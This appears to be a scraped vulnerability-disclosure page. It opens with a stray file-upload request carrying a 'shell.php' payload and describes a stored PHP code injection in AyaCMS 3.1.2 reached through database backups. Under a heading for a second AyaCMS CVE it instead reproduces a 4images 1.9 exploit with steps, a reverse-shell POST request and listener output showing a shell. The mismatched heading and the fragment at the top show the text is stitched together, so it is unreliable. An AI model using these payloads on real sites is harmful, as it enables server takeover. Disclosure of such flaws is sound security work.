    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu
    Content-Disposition: form-data; name="upfile"; filename="shell.php"
    Content-Type: text/plain
    
    <?php phpinfo(); ?>
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu--

CVE-2022-47926: AyaCMS v3.1.2 has  Arbitrary file operations Vulnerability · Issue #7 · loadream/AyaCMS

AyaCMS v3.1.2 was found to have a code flaw in the ust_sql.inc.php file, which allows attackers to cause command execution by inserting malicious code.

Vulnerable path ：/aya/module/admin/ust\_sql.inc.php  
Vulnerability description: In the ust\_sql.inc.php file, the $dir parameter is composed of year, month, day\_hour, minute and second\_random four characters. When we back up the database, the system will query all the data and save the data to /backup/$dir/path , and stored in 1.php file format, but in the process of data insertion, reading and writing, the data is not strictly filtered, only the special characters in the string used in the SQL statement are escaped through the mysql\_escape\_string function, so we can Randomly add malicious php codes such as in articles, messages and other functions, and finally write the malicious codes into the 1.php backup file by backing up the database. When we visit the 1.php file again , which can cause the command to be executed.  
  

We can freely add malicious php codes in articles, messages and other functions  
  
Finally, by backing up the database, write the malicious code into the 1.php backup file  
  
  
Remember this folder name  
  
Then we go to access the 1.php file in this folder，We can find that the malicious code executes  
  
And we can write PHP Trojans to execute system commands and control servers。

CVE-2022-46101: AyaCMS v3.1.2 RCE vulnerability · Issue #6 · loadream/AyaCMS

4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

Tag

#php